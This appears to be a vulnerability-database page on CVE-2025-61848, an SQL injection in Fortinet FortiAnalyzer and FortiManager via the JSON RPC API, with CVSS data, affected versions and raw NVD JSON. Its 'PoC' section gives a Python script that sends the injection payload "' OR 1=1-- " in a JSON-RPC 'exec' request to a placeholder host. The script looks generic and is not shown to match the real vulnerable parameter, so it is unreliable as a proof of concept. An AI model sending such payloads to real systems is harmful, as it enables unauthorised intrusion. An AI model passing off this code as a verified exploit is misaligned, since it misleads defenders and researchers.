Security Vulnerability Report
CVE-2025-61848 CVSS 7.2 HIGH

CVE-2025-61848

Published: 2026-04-14 16:16:32
Last Modified: 2026-04-20 18:05:42

Description

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE (7.0.0 up to but excluding 7.4.9; 7.6.0 up to but excluding 7.6.5)
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* - VULNERABLE (7.0.0 up to but excluding 7.4.9; 7.6.0 up to but excluding 7.6.5)
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* - VULNERABLE (7.0.0 up to but excluding 7.4.9; 7.6.0 up to but excluding 7.6.5)
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* - VULNERABLE (7.0.0 up to but excluding 7.4.9; 7.6.0 up to but excluding 7.6.5)

FortiAnalyzer 7.0 all versions
FortiAnalyzer 7.2 all versions
FortiAnalyzer 7.4.0 through 7.4.8
FortiAnalyzer 7.6.0 through 7.6.4
FortiAnalyzer Cloud 7.0 all versions
FortiAnalyzer Cloud 7.2 all versions
FortiAnalyzer Cloud 7.4.0 through 7.4.8
FortiAnalyzer Cloud 7.6.0 through 7.6.4
FortiManager 7.0 all versions
FortiManager 7.2 all versions
FortiManager 7.4.0 through 7.4.8
FortiManager 7.6.0 through 7.6.4
FortiManager Cloud 7.0 all versions
FortiManager Cloud 7.2 all versions
FortiManager Cloud 7.4.0 through 7.4.8
FortiManager Cloud 7.6.0 through 7.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Target configuration (placeholders must be filled in by the tester)
target_url = "https://<target-ip>/jsonrpc"
headers = {
    "Content-Type": "application/json",
    "Cookie": "<authenticated_session_cookie>"
}

# Vulnerable payload demonstrating SQL Injection via JSON RPC
# This payload attempts to manipulate a SQL query logic
payload = {
    "id": 1,
    "method": "exec",
    "params": [
        {
            "data": "valid_data' OR 1=1-- "
        }
    ]
}

try:
    response = requests.post(target_url, data=json.dumps(payload),
                             headers=headers, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:", response.text)
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-111 (Vendor Advisory)
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61848", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.610", "lastModified": "2026-04-20T18:05:41.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "FB8E4D80-6F2B-476C-AC28-981416A6C26D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "00645EEE-3E67-4B98-BB49-B23AD1D60B54"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "927AF131-67C2-4DA4-9171-7C5CCA52C7F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "EFE9F8B4-3B5B-43FC-A286-11A5DFB43393"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "522F42DB-51DC-4FF2-ADA1-AB3129E939CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "9F4A9AA3-C6AA-428B-AE1B-61F61658D642"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "3EE58778-BB43-439E-887B-F6E401A2B67C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "CBA159E6-BBE9-4630-800A-5C4B3BAF23BB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-111", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}